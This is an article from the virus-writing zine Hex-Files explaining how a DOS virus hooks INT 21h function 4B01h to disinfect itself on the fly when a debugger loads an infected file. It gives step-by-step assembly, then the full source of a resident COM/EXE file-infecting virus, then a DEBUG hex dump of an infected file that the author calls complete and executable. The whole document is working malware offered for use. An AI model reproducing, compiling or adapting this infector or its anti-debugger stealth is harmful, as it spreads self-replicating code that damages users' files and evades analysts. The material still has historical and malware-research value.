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Hexfiles Issue 3 File 002

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 · 9 Aug 2024

HEX-FILES No. 3 File 002

4B01h/21h Stealthing Overview

by: YeZ

All these years, virus programmers used the 4B00h/21h (load and execute
program) as a trigger for infection. Why not use another DOS executing
function -- 4B01h/21h (load without executing). This function is used by
debuggers, such as DEBUG, TD (Turbo Debugger), Softice and other debuggers
to load a program. Intercepting this DOS function enables the virus to hide
itself when a debugger is being used.

Here's a step by step guide on how to do this:

1. First of all we should save the ES:BX, DS:DX in our virus code before
calling the routine because all registers are considered destroyed on
return. ES:BX points to the execution parameter of the program to be
executed and DS:DX points to the name of the program to be executed.

mov word ptr cs:[es_bx],bx ;Save offset of EXEC parameter
mov word ptr cs:[es_bx+2],es ;Save Segment of EXEC parameter
mov word ptr cs:[ds_dx],dx ;Save offset of EXEC filename
mov word ptr cs:[ds_dx+2],ds ;Save segment of EXEC filename

2. After saving all the vital data, call the original INT 21h.

call _i21_call ;Call INT 21h


call cs:[i21] ; Contains the original seg:off of INT 21h

3. After executing the original INT 21h, save all registers, segments and
all those garbage, so that the calling debugger would not notice
something fishy is going on. Failing to do this would hang the debugger

call _pusha ;Push all Registers !!!
This sub-module will save all registers and segments.

4. After saving all registers, we have to check the program if it is
infected by our virus. In our demo, we used the date as our infection
marker. If the marker is not found (uninfected program) then jump to
step 7. :(

Note: You can hook to the infection routine to infect the program, if it
is not infected. I didn't do it here in our demo because you are
supposed to do it yourself.... :)

lds dx,cs:[ds_dx] ;Use saved DS:DX filename
xor al,al ;Open file...
call _open_file ;_open_file()
jc out_debug_routine ;On error out_debug_routine
mov ax,5700h ;Get file time/date...
call _i21_call ;Call real INT 21h
call _close_file ;Close file now...
cmp dx,24cch ;CMP virus marker ... ?
je ok_disinfect ;If virus marker found then continue.
jmp out_debug_routine ;If not virus marker then go out...

5. If the marker is present, the next thing to do is determine the type of
program being infected. In our case, a program which starts with E9h
(JMP XXXX) is assumed to be a COM program. Otherwise, it is considered
an EXE :)

les di,cs:[es_bx] ;Load EXEC parameters to ES:DI.
lds si,dword ptr es:[di+18] ;Load CS:IP of debugged program.
push ds ;{ Load DS:SI = ES:DI
pop es ; this is the CS:IP of the debugged
mov di,si ; program... }
cld ;Clear Direction flag AY!
lodsb ;Lode byte to AL
cmp al,0e9h ;CMP it with 0E9H = "JMP displacement"
jne exe_file_debug ;!= then it is an EXE program.

6.A We are assuming that the infected program is a COM. We should return all
original data to the entry point of the COM program, by moving it
towards the program's entry point. The debugger will now be viewing the
original entry point of the program before the infection, effectively
disinfecting it. All COM entry point is always at offset 100h :)

lodsw ; Load "offset" to AX
add ax,3 ; Add 3 to adjust with 0e9,??,??
add ax,di ; to get the delta offset
mov bp,ax ; move AX to BP
lea si,vir_data[bp] ; Load the data
mov cx,header_end - header ; number of bytes to move...
rep movsb ; move it now...
jmp out_debug_routine ; Get out ta here will ya! hehehehe!

6.B We are assuming that the infected program is an EXE. In this case, we
are not returning any data by moving it towards the program entry point
instead we will be calculating the uninfected entry point address of the
program before the infection. This will also effectively disinfected
infected EXE program, by means of returning the program's entry point
to its original uninfected state. (We will be doing some MATH here... :)

We are assuming that the infected program is an EXE. In this case, we
would not be moving any host data but we would have to calculate the
original entry point address of the program. Unlike COMs, EXEs entry
point could be located anywhere in the program. By restoring the
program's entry point to its original uninfected state would also
effectively disinfected EXE program, . (We will be doing some MATH
here... :) )

mov bp,di ; Put DI to BP to serve as delta
lea si,vir_data[bp] ; Load SI debug program vir_data[BP]
add si,0eh ; To direct towards SS:SP data.
cld ; Of coz clear direct...
lodsw ; Load SS displacement to AX
xchg ax,cx ; Save it in CX
add si,6 ; To direct towards CS:IP data.
lodsw ; Load CS displacemet to AX
xchg ax,dx ; Save it in DX
lodsw ; This is just to adjust You'll see.
les bx,cs:[es_bx] ; Load ES:BX(environtment parameter)
lodsw ; Load uninfected SS displacement
sub cx,ax ; Subtract it with the infected one.
sub word ptr es:[bx+14+2],cx ; Update SS in the parameter
lodsw ; Load uninfected SP offset
dec ax ; { Decrement it twice to adjust to
dec ax ; the stack }
mov word ptr es:[bx+14],ax ; Update SP in the parameter
lodsw ; Load Uninfected IP
mov word ptr es:[bx+18],ax ; Update IP in the parameter
lodsw ; Load uninfected CS
sub dx,ax ; Subtract it with the infected one.
sub word ptr es:[bx+18+2],dx ; Update CS in the parameter

out_debug_routine: ; Terminal end-point!!!

7. We should POP out all the saved registers and segments then return to
the program (debugger) which called the 4B01h/21h routine. (This is the
last thing we should do).

call _popa ;Pop all Register !!!
iret ;Return to calling module...

The demo virus is found below this document. And please read the disclaimer
of the demo virus being presented.

I hope you enjoyed and understood this article and the demo virus. Because
if you didn't then I'm truly screwed...!!! Please forgive me for any wrong
grammar, program bug, or anything misleading found in this article.

If you have any comments, suggestions, insults, questions, or absolutely
anything, send it to


; Virus which demonstrate 4B01h/21h stealthing by: YeZ
; Virus Characteristics:
; File Infection: COM & EXE (except COMMAND.COM & WIN(EXE) or Compressed(EXE))
; Stealth: 4B01h Stealth...
; Polymorphicity: NOP...
; Encryption: NOP...
; Tunneling: NOP..
; Payload: NOP...
; Unoptimized...
; (8^[)
; ...
; This virus has no special features, no fancy tricks, it only demonstrates
; 4B01h/21h (debugging stealth). This virus will not infect programs that are
; write protected, hidden, or system. Therefore write protect all vital
; programs before testing this virus...
; Disclaimer:
; This is a complete executable virus when compiled, the author and the
; zine is not responsible for any damage caused by this program, *use at your
; Greetz:
; PhVx: Keep up the good work "PsK are you alone in this zine?"
; Putoksa Kawayan: Great Job for the PhVx!!!
; Mikee: "Jesus saves!!!"
; Jonjon Gumba: Possessed! Bha!ha!ha!ha! how is that for an introduction?
; Lyndon Xiao: is being Smitten by XTaC :)
; OGGO: write some more graphic viruses!!!
; XED: Lord of all nightmares!!!
; Luis Sarmenta: Vir-X shall I say is alright??? :)
; All Vx & Av of the Philippines and abroad "peace and be wild...!!!"
; Foriegn Greetz:
; Darkman: Thanx for sending me the 29A-2 & your staff, it was great man!
; Urgo32: A tout le monde "tell me what this means :)"
; Buzzo: Thanx for your text at least you really wanted me to learn...
; LovinGod: Thanx 4 the PGP thing, "hey where is my TASM 4.0? hehehe:)"
; SuperX: Buenas dias amigo!!! "I don't know proper spanish :("
; Yesna: Our IRC sucks that's why I cannot visit the #virus until now :(
; Vdaemon: Thanx for the Op man long live #vir hehehehe!!! :)
; CyberYoda: I missed you on IRC #virus & #vir
; Slumdung: Hiya there my asian friend...
; Owl[FS]/Methyl: Tell me about super virus... :)
; Wolfman: Don't eat me. :)
; StealthWarrior: Thanx for your .EXE file infection. :)
; All of you in the Vx scene...
; And last but not the least *YOU* the reader "If I have any?"
; You know who you are you fucken' rule... -Pantera- :)
; From: YeZ
; This source code could be compiled in TASM 2.01 without problem.
; When compiled in MASM 5.0, it will generate a "phase error" message. If
; you would still insist on using MASM, you would have to fix the problem.
; This can be compiled in A86 4.02 but remember that A86 generates different
; opcodes for some instructions, that is, in comparison to TASM and MASM.

.model small

org 0

YeZ segment

assume cs:YeZ,ds:YeZ,es:YeZ

start_vir: ;Marks the beginning code delta.

call _do_delta ; Set virus routine
int 3 ; Call virus routine

mov bp,sp
mov bp,[bp]
sub bp,3
push ds
xor ax,ax
mov ds,ax
mov bx,03*4

push [bx]
pop word ptr cs:[i21][bp]
push [bx+2]
pop word ptr cs:[i21+2][bp]
lea ax,_do_infect_ram[bp]

mov [bx],ax
mov [bx+2],cs

pop word ptr cs:[ds_to_safe][bp]


push word ptr cs:[i21+2][bp]
pop [bx+2]
push word ptr cs:[i21][bp]
pop [bx]

mov ax,0000
ds_to_safe equ $ - 2
mov ds,ax

push cs
mov ax,0feefh ;Check virus presence. If present
int 21h ;then the virus will immediately
;Jump to the host program instead of
;proceeding to the next instruction in
;this Vx code :)
pop ax
push ds
push es
mov ah,4ah ; Let the program allocate all the
xor bx,bx ; memory present in your system...
not bx ; by putting 0FFFFH in BX
int 21h

mov ah,4ah ;Subtract total virus size*2+3
sub bx,((end_vir-start_vir)/16)+3 ;paragraphs from the total
int 21h ;memory and resize allocated

mov ah,48h ;Allocate that free memory
mov bx,((end_vir-start_vir)/16)+2 ;subtracted from the above
int 21h ;routine have I given you a
;clue... :)
push ax
dec ax
push ax
pop ds

mov byte ptr ds:[0],'Z' ;Mark allocated memory as last.
mov word ptr ds:[1],8 ;Mark the allocated memory to be
;owned by DOS.
push cs
pop ds
pop es

mov si,bp
xor di,di
mov cx,end_vir-start_vir
rep movsb ;Copy the virus to the allocated memory.

xor ax,ax
mov ds,ax
mov bx,21h*4
mov ax,[bx]
mov word ptr es:[i21],ax
mov ax,[bx+2]
mov word ptr es:[i21+2],ax ;Get INT 21h

lea ax,_vir_int21 ;Link INT 21h to our VIRUS :)
mov [bx],ax
mov [bx+2],es

pop es
pop ds
jmp _jump_here_after_ram_infect ;Do I need to comment this one??

cmp ax,4b00h ;Load and Execute program routine
je _infect_file
cmp ax,4b01h ;Load w/o Executing (this is our target)
jne chk_presence
jmp _stealth_debug
cmp ax,0feefh ;Check for presence :)
jne _jmp_to_int21
jmp _ret_to_prog

db 0eah
i21 dd 0

_infect_file: ;The infection routine of the virus...
call _pusha ;Push all registers
call _set_up_ints ;Reset INTs (23h & 24h)

call _set_up_file ;Setup the file
jc out_infect_file
call _infect_file_now ;YAY!!!!
jc close_now
call _put_marker ; Try to see the marker... :)

call close_set_up_file ;Close the file damnit!!!

call _ret_up_ints ;Return reset INTs
call _popa ;Pop all registers
jmp _jmp_to_int21 ;Do I need to elaborate on this one?

_set_up_ints: ;Revector INT 23h and 24h
push ds
xor ax,ax
mov ds,ax
mov bx,24h*4
push [bx]
push [bx+2]
pop word ptr cs:[i24+2]
pop word ptr cs:[i24]
lea ax,_i24
mov [bx],ax
mov [bx+2],cs
sub bx,4
push [bx]
push [bx+2]
pop word ptr cs:[i23+2]
pop word ptr cs:[i23]
lea ax,_i23
mov [bx],ax
mov [bx+2],cs
pop ds


_ret_up_ints: ;Return INT 23h and 24h
push ds
xor ax,ax
mov ds,ax
mov bx,23h*4
push word ptr cs:[i23+2]
push word ptr cs:[i23]
pop [bx]
pop [bx+2]
add bx,4
push word ptr cs:[i24+2]
push word ptr cs:[i24]
pop [bx]
pop [bx+2]
pop ds


_set_up_file: ;Setting up file to infect...

mov al,2
call _open_file
jc out_set_up_file
call _sft_
jnc out_set_up_file
call close_set_up_file


call _close_file

_sft_: ;SFT functions this is very powerful
push bx ;when used properly.
mov ax,1220h
push ax
int 2fh
jc out_sft
mov bl,byte ptr es:[di]
cmp bl,0ffh
je str_sft
pop ax
sub al,0ah
int 2fh
test byte ptr es:[di+4],111b ;Check file Attribute?
;111b = system,hidden,read/only!!!
jnz str_sft ;if so do not infect...

cmp word ptr es:[di+0fh],24cch ;Check date with our marker...?
je str_sft ;if equal do not infect...

add di,20h ;Check filename to be COMMAND.COM
mov si,offset command
mov cx,11
push cs
pop ds
rep cmpsb
je str_sft ;if so do not infect...
jmp out_sft
pop bx

mov cx,header_end - header
mov dx,offset vir_data
call _read_file

mov si,dx
xor ah,al
cmp ah,'M' xor 'Z'
je _exe_file_to_infect

mov byte ptr cs:[host_type],'C' ;Put COM Marker...
mov al,2
call _move_pointer
cmp ax,80h ;Don't infect COM below 128 bytes...
jnb good_com_size
jmp out_infect_file_now
sub ax,3
mov word ptr cs:[jmp_vir],ax
call _writing_the_virus
jnc cont_com_infect
jmp out_infect_file_now
mov cx,header_end - header
mov dx,offset header
call _write_file

cmp byte ptr [vir_data+18h],40h ;NewEXE
jb exe_is_a_dos_ok ;If below 40h then DOS(exe)
jmp out_infect_file_now

mov byte ptr cs:[host_type],'E' ;Put EXE marker...
mov cx,1ah
push cx
push bx

mov al,2
call _move_pointer
push dx
push ax

push cs
pop es
mov cx,2
lea di,vir_data
mov si,di
add di,1ah
add si,0eh
push cx
rep movsw
pop cx
add si,cx
rep movsw
mov ax,word ptr [vir_data+8]
mov cl,4
shl ax,cl
mov bx,ax
pop ax
pop dx
push dx
push ax
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr [vir_data+14h],dx
mov word ptr [vir_data+16h],ax
mov word ptr [vir_data+0eh],ax
mov word ptr [vir_data+10h],'FY'
pop ax
pop dx
add ax,end_vir - start_vir
adc dx,0
mov cl,9
push ax
shr ax,cl
ror dx,cl
adc dx,ax
pop ax
and ah,1
mov word ptr [vir_data+4],dx
mov word ptr [vir_data+2],ax
pop bx
call _writing_the_virus
jc out_infect_file_now
lea dx,vir_data
pop cx
call _write_file


xor dx,dx
mov cx,end_vir-start_vir
call _write_file
cmp ax,cx
je ok_to_write_vir
jmp out_writing_the_virus
xor al,al
call _move_pointer

mov ax,5700h ;Get date
call _i21_call
inc al ;Set date
mov dx,24cch ;Put marker date see it for yourself :)
call _i21_call


_open_file: ;Open file routine
mov ah,3dh
call _i21_call
xchg bx,ax
cmp bx,5
jnb clr_to_open
jmp out_open_file

_read_file: ;read file routine
mov ah,3fh
call _i21_call

_write_file: ;write file routine
mov ah,40h
call _i21_call

_move_pointer: ;file pointer routine
xor cx,cx
xor dx,dx
mov ah,42h
call _i21_call

_close_file: ;close file routine
mov ah,3eh
call _i21_call

call cs:[i21]

; ******************************************
; This is will be our routine... :) enjoy!!!
; ******************************************

mov word ptr cs:[es_bx],bx ;Save offset of EXEC parameter
mov word ptr cs:[es_bx+2],es ;Save Segment of EXEC parameter
mov word ptr cs:[ds_dx],dx ;Save offset of EXEC filename
mov word ptr cs:[ds_dx+2],ds ;Save segment of EXEC filename
call _i21_call ;Call INT 21h
call _pusha ;Push all Register !!!
call _debug_routine ;Call our routine ;)
call _popa ;Pop all Register !!!
iret ;Return to calling module...

lds dx,cs:[ds_dx] ;Use the saved DS:DX filename
xor al,al ;Open file...
call _open_file ;_open_file()
jc out_debug_routine ;On error out_debug_routine
mov ax,5700h ;Get file time/date...
call _i21_call ;Call real INT 21h
call _close_file ;Close file now...
cmp dx,24cch ;CMP virus marker ... ?
je ok_disinfect ;If virus marker found then continue.
jmp out_debug_routine ;If virus marker then go out...

les di,cs:[es_bx] ;Load EXEC parameters to ES:DI.
lds si,dword ptr es:[di+18] ;Load CS:IP of debugged program.
push ds ;{ Load DS:SI = ES:DI
pop es ; this is the CS:IP of the debugged
mov di,si ; program... }
cld ; Clear Direction flag AY!
lodsb ; Lode byte to AL
cmp al,0e9h ; CMP it with 0E9H = "JMP offset"
jne exe_file_debug ; != then it is an EXE program.
lodsw ; Lode "offset" to AX
add ax,3 ; Add 3 to adjust with 0e9,??,??
add ax,di ; to get the delta offset
mov bp,ax ; move AX to BP
lea si,vir_data[bp] ; Load the data
mov cx,header_end - header ; number of bytes to move...
rep movsb ; move it now...
jmp out_debug_routine ; Get out ta here will ya!

; Then we are set for hiding the virus in the COM program when someone is
; debugging it...
; isn't it simple ... :)

mov bp,di ; Put DI to BP to serve as delta
lea si,vir_data[bp] ; Load SI debug program vir_data[BP]
add si,0eh ; To direct towards SS:SP data.
cld ; Of coz clear direct...
lodsw ; Load SS displacement to AX
xchg ax,cx ; Save it in CX
add si,6 ; To direct towards CS:IP data.
lodsw ; Load CS displacemet to AX
xchg ax,dx ; Save it in DX
lodsw ; This is just to adjust You'll see.
les bx,cs:[es_bx] ; Load ES:BX(environtment parameter)
lodsw ; Load uninfected SS displacement
sub cx,ax ; Subtract it with the infected one.
sub word ptr es:[bx+14+2],cx ; Update SS in the parameter
lodsw ; Load uninfected SP offset
dec ax ; { Decrement it twice to adjust to
dec ax ; the stack }
mov word ptr es:[bx+14],ax ; Update SP in the parameter
lodsw ; Load Uninfected IP
mov word ptr es:[bx+18],ax ; Update IP in the parameter
lodsw ; Load uninfected CS
sub dx,ax ; Subtract it with the infected one.
sub word ptr es:[bx+18+2],dx ; Update CS in the parameter

; Then we are set for hiding the virus in the EXE program when someone is
; debugging it...
; isn't it simple ... :)



add sp,6
pop ds
cmp byte ptr [host_type][bp],'C' ;Checking host type?
jne _exe_host_to_ret

_com_host_to_ret: ;COM program return to host program...
lea si,vir_data[bp]
mov di,100h
push di
mov cx,header_end - header
rep movsb
pop di
push bp
mov bp,sp
mov [bp+2],di
pop bp
jmp out_from_ret

lea si,vir_data+1ah[bp]
xor dh,dh
call _adjust_exe_proc
mov sp,ax
mov ss,bx
inc dh
call _adjust_exe_proc
mov cx,word ptr [ds_to_safe][bp]
mov ds,cx

push ax
push bx


mov cx,es
cmp dh,1
je this_cs_ip
call _add_segment_exe
xchg ax,bx
cmp dh,1
jne out_adjust_exe_proc
add ax,cx
add ax,10h


_i24: ;Virus INT 24h
mov al,3
_i23: ;Virus INT 23h

_pusha: ; Routine to PUSH all registers and segments...
pop cs:[pp]
push ax
push bx
push cx
push dx
push di
push si
push ds
push es
push bp
jmp cs:[pp]

_popa: ; Routine to POP all registers and segments...
pop cs:[pp]
pop bp
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
jmp cs:[pp]

pp dw 0
host_type db 'C'
header db 0E9H
jmp_vir dw 0
db 13,'YeZ =PhVx= Article virus (demonstration purposes only)...'
db 13,10,1ah
header_end equ $
command db 'COMMAND COM'
vir_data db 0CDH,20H,90H,(header_end - header) dup (90h)

es_bx dd 0 ;This is our routine variable ES:BX
ds_dx dd 0 ;This is our routine variable DS:DX
i23 dd 0
i24 dd 0


YeZ ends



This is a file infected by the compiled demo virus above courtesy of YeZ.
Source code was compiled in TASM 2.01.

Have fun... and care!


E 0100 E9 CA 01 0D 59 65 5A 20 3D 50 68 56 78 3D 20 41
E 0110 72 74 69 63 6C 65 20 76 69 72 75 73 20 28 64 65
E 0120 6D 6F 6E 73 74 72 61 74 69 6F 6E 20 70 75 72 70
E 0130 6F 73 65 73 20 6F 6E 6C 79 29 2E 2E 2E 0D 0A 1A
E 0140 65 20 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A
E 0150 42 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 6C
E 0160 69 76 65 20 62 79 20 48 45 58 2D 46 49 4C 45 53
E 0170 20 4E 6F 2E 20 33 0D 0A 0A 48 45 58 2D 46 49 4C
E 0180 45 53 20 61 6E 64 20 59 65 5A 20 61 72 65 20 6E
E 0190 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65 20 66
E 01A0 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70 6C 69
E 01B0 65 64 20 61 6E 64 2F 6F 72 20 69 6D 61 67 69 6E
E 01C0 61 72 79 20 0D 0A 64 61 6D 61 67 65 20 61 72 69
E 01D0 73 69 6E 67 20 64 69 72 65 63 74 6C 79 20 6F 72
E 01E0 20 69 6E 64 69 72 65 63 74 6C 79 20 66 72 6F 6D
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74
E 0210 68 69 73 0D 0A 70 72 6F 67 72 61 6D 2E 20 54 68
E 0220 65 20 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65
E 0230 63 75 74 65 73 20 74 68 69 73 20 70 72 6F 67 72
E 0240 61 6D 20 62 65 61 72 73 20 66 75 6C 6C 20 72 65
E 0250 73 70 6F 6E 73 69 62 69 6C 69 74 79 20 66 6F 72
E 0260 0D 0A 68 69 73 2F 68 65 72 20 61 63 74 69 6F 6E
E 0270 73 2E 0D 0A 0A 54 68 69 73 20 70 72 6F 67 72 61
E 0280 6D 20 69 73 20 73 74 72 69 63 74 6C 79 20 66 6F
E 0290 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20 6F 72
E 02A0 20 72 65 73 65 61 72 63 68 20 70 75 72 70 6F 73
E 02B0 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 0A 24 08 20 1A
E 02C0 0E 1F BA 07 01 B4 09 CD 21 B4 4C CD 21 E8 01 00
E 02D0 CC 8B EC 8B 6E 00 83 ED 03 1E 33 C0 8E D8 BB 0C
E 02E0 00 FF 37 2E 8F 86 BE 00 FF 77 02 2E 8F 86 C0 00
E 02F0 8D 86 34 00 FA 89 07 8C 4F 02 FB 2E 8F 86 46 00
E 0300 C3 FA 2E FF B6 C0 00 8F 47 02 2E FF B6 BE 00 8F
E 0310 07 FB B8 65 0F 8E D8 0E B8 EF FE CD 21 58 1E 06
E 0320 B4 4A 33 DB F7 D3 CD 21 B4 4A 83 EB 4B 90 CD 21
E 0330 B4 48 BB 4A 00 CD 21 50 48 50 1F C6 06 00 00 5A
E 0340 C7 06 01 00 08 00 0E 1F 07 8B F5 33 FF B9 83 04
E 0350 FC F3 A4 33 C0 8E D8 BB 84 00 8B 07 26 A3 BE 00
E 0360 8B 47 02 26 A3 C0 00 B8 A8 00 FA 89 07 8C 47 02
E 0370 FB 07 1F EB A2 3D 00 4B 74 15 3D 01 4B 75 03 E9
E 0380 0D 02 3D EF FE 75 03 E9 9D 02 EA F8 40 11 00 E8
E 0390 F5 02 E8 18 00 E8 83 00 72 0B E8 CF 00 72 03 E8
E 03A0 AA 01 E8 87 00 E8 44 00 E8 F0 02 EB DD 1E 33 C0
E 03B0 8E D8 BB 90 00 FF 37 FF 77 02 2E 8F 06 81 04 2E
E 03C0 8F 06 7F 04 B8 B6 03 FA 89 07 8C 4F 02 FB 83 EB
E 03D0 04 FF 37 FF 77 02 2E 8F 06 7D 04 2E 8F 06 7B 04
E 03E0 B8 B9 03 FA 89 07 8C 4F 02 FB 1F C3 1E 33 C0 8E
E 03F0 D8 BB 8C 00 2E FF 36 7D 04 2E FF 36 7B 04 FA 8F
E 0400 07 8F 47 02 FB 83 C3 04 2E FF 36 81 04 2E FF 36
E 0410 7F 04 FA 8F 07 8F 47 02 FB 1F C3 B0 02 E8 3B 01
E 0420 72 0D E8 0B 00 73 08 E8 02 00 F9 C3 E8 53 01 C3
E 0430 53 B8 20 12 50 CD 2F 72 31 26 8A 1D 80 FB FF 74
E 0440 28 58 2C 0A CD 2F 26 F6 45 04 07 75 1C 26 81 7D
E 0450 0F CC 24 74 14 83 C7 20 BE 25 04 B9 0B 00 0E 1F
E 0460 FC F3 A6 74 04 F8 EB 02 90 F9 5B C3 B9 40 00 BA
E 0470 30 04 E8 F7 00 8B F2 FC AD 32 E0 80 FC 17 74 2D
E 0480 2E C6 06 E4 03 43 B0 02 E8 ED 00 3D 80 00 73 04
E 0490 F9 E9 A0 00 2D 03 00 2E A3 E6 03 E8 97 00 73 03
E 04A0 E9 91 00 B9 40 00 BA E5 03 E8 C6 00 C3 80 3E 48
E 04B0 04 40 72 04 F9 EB 7D 90 2E C6 06 E4 03 45 B9 1A
E 04C0 00 51 53 B0 02 E8 B0 00 52 50 0E 07 B9 02 00 BF
E 04D0 30 04 8B F7 83 C7 1A 83 C6 0E 51 FC F3 A5 59 03
E 04E0 F1 F3 A5 A1 38 04 B1 04 D3 E0 8B D8 58 5A 52 50
E 04F0 2B C3 83 DA 00 B9 10 00 F7 F1 89 16 44 04 A3 46
E 0500 04 A3 3E 04 C7 06 40 04 59 46 58 5A 05 83 04 83
E 0510 D2 00 B1 09 50 D3 E8 D3 CA F9 13 D0 58 80 E4 01
E 0520 89 16 34 04 A3 32 04 5B E8 0A 00 72 07 BA 30 04
E 0530 59 E8 3E 00 C3 33 D2 B9 83 04 E8 35 00 3B C1 74
E 0540 04 F9 EB 07 90 32 C0 E8 2E 00 F8 C3 B8 00 57 E8
E 0550 36 00 FE C0 BA CC 24 E8 2E 00 C3 B4 3D E8 28 00
E 0560 93 83 FB 05 73 04 F9 EB 02 90 F8 C3 B4 3F E8 17
E 0570 00 C3 B4 40 E8 11 00 C3 33 C9 33 D2 B4 42 E8 07
E 0580 00 C3 B4 3E E8 01 00 C3 9C 2E FF 1E BE 00 C3 2E
E 0590 89 1E 73 04 2E 8C 06 75 04 2E 89 16 77 04 2E 8C
E 05A0 1E 79 04 E8 E2 FF E8 DE 00 E8 04 00 E8 EC 00 CF
E 05B0 2E C5 16 77 04 32 C0 E8 A1 FF 72 6A B8 00 57 E8
E 05C0 C6 FF E8 BD FF 81 FA CC 24 74 03 EB 59 90 2E C4
E 05D0 3E 73 04 26 C5 75 12 1E 07 8B FE FC AC 3C E9 75
E 05E0 14 AD 05 03 00 03 C7 8B E8 8D B6 30 04 B9 40 00
E 05F0 F3 A4 EB 32 90 8B EF 8D B6 30 04 83 C6 0E FC AD
E 0600 91 83 C6 06 AD 92 AD 2E C4 1E 73 04 AD 2B C8 26
E 0610 29 4F 10 AD 48 48 26 89 47 0E AD 26 89 47 12 AD
E 0620 2B D0 26 29 57 14 C3 83 C4 06 1F 3E 80 BE E4 03
E 0630 43 75 19 8D B6 30 04 BF 00 01 57 B9 40 00 FC F3
E 0640 A4 5F 55 8B EC 89 7E 02 5D EB 1F 90 8D B6 4A 04
E 0650 32 F6 E8 16 00 FA 8B E0 8E D3 FB FE C6 E8 0B 00
E 0660 3E 8B 8E 46 00 8E D9 9C 50 53 CF 8C C1 AD 80 FE
E 0670 01 74 03 E8 07 00 93 AD 80 FE 01 75 05 03 C1 05
E 0680 10 00 C3 B0 03 F9 CF 2E 8F 06 E2 03 9C 50 53 51
E 0690 52 57 56 1E 06 55 2E FF 26 E2 03 2E 8F 06 E2 03
E 06A0 5D 07 1F 5E 5F 5A 59 5B 58 9D 2E FF 26 E2 03 C5
E 06B0 00 43 E9 CA 01 0D 59 65 5A 20 3D 50 68 56 78 3D
E 06C0 20 41 72 74 69 63 6C 65 20 76 69 72 75 73 20 28
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E 06E0 72 70 6F 73 65 73 20 6F 6E 6C 79 29 2E 2E 2E 0D
E 06F0 0A 1A 43 4F 4D 4D 41 4E 44 20 43 4F 4D E9 BD 01
E 0700 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A
E 0710 0A 54 68 69 73 20 69 73 20 59 65 5A 2E 31 31 35
E 0720 35 20 76 69 72 75 73 20 63 6F 6D 69 6E 67 20 74
E 0730 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68 90 90 90
E 0740 94 4A 76 0F 81 00 76 0F 4A 01 28 0E 55 01 28 0E




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